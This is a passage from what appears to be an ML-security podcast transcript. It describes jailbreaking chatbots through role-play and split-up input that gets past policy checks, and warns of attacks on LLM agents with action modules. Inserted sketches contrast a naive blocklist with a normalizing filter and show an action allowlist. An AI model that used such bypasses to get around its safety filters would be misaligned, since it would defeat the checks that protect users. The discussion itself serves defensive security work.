They don't have their own morals and values and things like this. And so they have mechanisms that are more or less capable of automating a cognitive task. And in that sense they are limited. They are fragile. And people have found ways to actually deceive the context detection system such that the policy guard can get fooled and allow conversations that are inappropriate, to output some toxic content or speak about issues that the initial policy wouldn't allow.

And the easiest way to do that would be to engage in role playing. Ask the system to play a specific role instead of asking it directly, “tell me something,” which the policy engine would reject. You tell it, “Hey, imagine you are such-and-such person and you have these qualities, respond to me in a way that this person would respond,” and that's the typical way these things break.

Another thing would be to tokenize your input. Instead of inputting the text as you normally would, you break it into pieces they call tokens, and then you submit it. It turns out that the context detection mechanism is not robust enough to handle input like that, and it just lets it go. And then the language model behind it, past the policy check, is capable of reinterpreting these tokens. And that's how you get them to say what you want them to say. So you kind of bypass the controls in that sense.
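[Illustrative sketch, not from the episode: a much-simplified picture of why splitting input into pieces can slip past a check. It assumes the check is a plain substring match against a blocklist, which is far cruder than a real chatbot's context detection; the blocked term and function names are hypothetical placeholders.]

```python
import re

BLOCKED_TERMS = {"forbidden topic"}  # hypothetical placeholder term


def naive_filter(text: str) -> bool:
    """Return True if the text contains a blocked term verbatim."""
    lowered = text.lower()
    return any(term in lowered for term in BLOCKED_TERMS)


def normalized_filter(text: str) -> bool:
    """Drop everything except letters and digits before matching,
    so that terms broken up with separators are rejoined."""
    squashed = re.sub(r"[^a-z0-9]", "", text.lower())
    return any(
        re.sub(r"[^a-z0-9]", "", term) in squashed
        for term in BLOCKED_TERMS
    )


plain = "Tell me about the forbidden topic"
split_up = "Tell me about the for-bid-den to|pic"

print(naive_filter(plain))          # True: caught verbatim
print(naive_filter(split_up))       # False: the split pieces slip through
print(normalized_filter(split_up))  # True: caught after normalization
```

[Normalizing like this trades one weakness for another, since squashing text together can also produce false matches across word boundaries.]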

So these are just the initial steps in which the technology has been engaged with and has shown quite a bit of fragility in that sense. But this is not the end of the road. More interesting stuff is coming, especially since we all know that chatbots for now have been deployed only in almost like a public demonstration mode. If you can engage with a chatbot, well, the only person affected is you. Because the toxic text is gonna be

D Dehghanpisheh 35:05

It's one on one.

Apostol Vassilev 35:06

Yeah, it's a one-on-one experience.

Certainly it can be dangerous, as some examples from Belgium have shown, that people who engage one-on-one with them can even be led to suicide by the inappropriate content they are exposed to. But that's not the point I'm making.

The point I'm making is that chatbots are now being connected to action modules that will take the instruction from the user and translate it into actions that would operate on your, say, inbox, in your email, or on your corporate network to create specific service requests or what have you.

Even in the simplest case, you can say, order pizza or something like that. You can get an idea. I'm just giving you a very rudimentary set of potential actions here. But that's where the next generation of attacks will come.
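[Illustrative sketch, not from the episode: one common way to limit what an action module can do is an allowlist of actions, with explicit user confirmation for sensitive ones. The registry, the action names, and the `dispatch` function below are hypothetical and do not describe any particular chatbot product.]

```python
from typing import Any, Callable, Dict, NamedTuple


class Action(NamedTuple):
    handler: Callable[..., str]
    needs_confirmation: bool


def order_pizza(size: str) -> str:
    return f"ordered a {size} pizza"


def send_email(to: str, body: str) -> str:
    return f"sent email to {to}"


# Only actions listed here can ever be executed on the user's behalf.
REGISTRY: Dict[str, Action] = {
    "order_pizza": Action(order_pizza, needs_confirmation=False),
    "send_email": Action(send_email, needs_confirmation=True),
}


def dispatch(name: str, args: Dict[str, Any], confirmed: bool = False) -> str:
    """Run a model-requested action only if it is allowlisted and,
    where required, explicitly confirmed by the user."""
    action = REGISTRY.get(name)
    if action is None:
        raise PermissionError(f"action not allowed: {name}")
    if action.needs_confirmation and not confirmed:
        raise PermissionError(f"action requires user confirmation: {name}")
    return action.handler(**args)
```

[In this sketch, a model-generated request for an unlisted action such as deleting an inbox is rejected outright, and sending email on the user's behalf fails unless `confirmed=True` is passed.]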

And in addition to that, we've all known from cybersecurity how dangerous phishing and spear phishing attacks are, right? Because they require creating specifically crafted emails to specific users. Now, LLMs allow you to craft very, very nicely worded, authentic-sounding email. That will put us on a totally new wave of well-known cybersecurity attacks. So all of these trends, my prediction is that we're going to see them evolve rapidly over the next few years.

[Closing] 36:35

Additional tools and resources to check out:

Protect AI Radar

Protect AI’s ML Security-Focused Open Source Tools

LLM Guard - The Security Toolkit for LLM Interactions

Huntr - The World's First AI/Machine Learning Bug Bounty Platform

Thanks for listening! Find more episodes and transcripts at https://mlsecops.com/podcast.
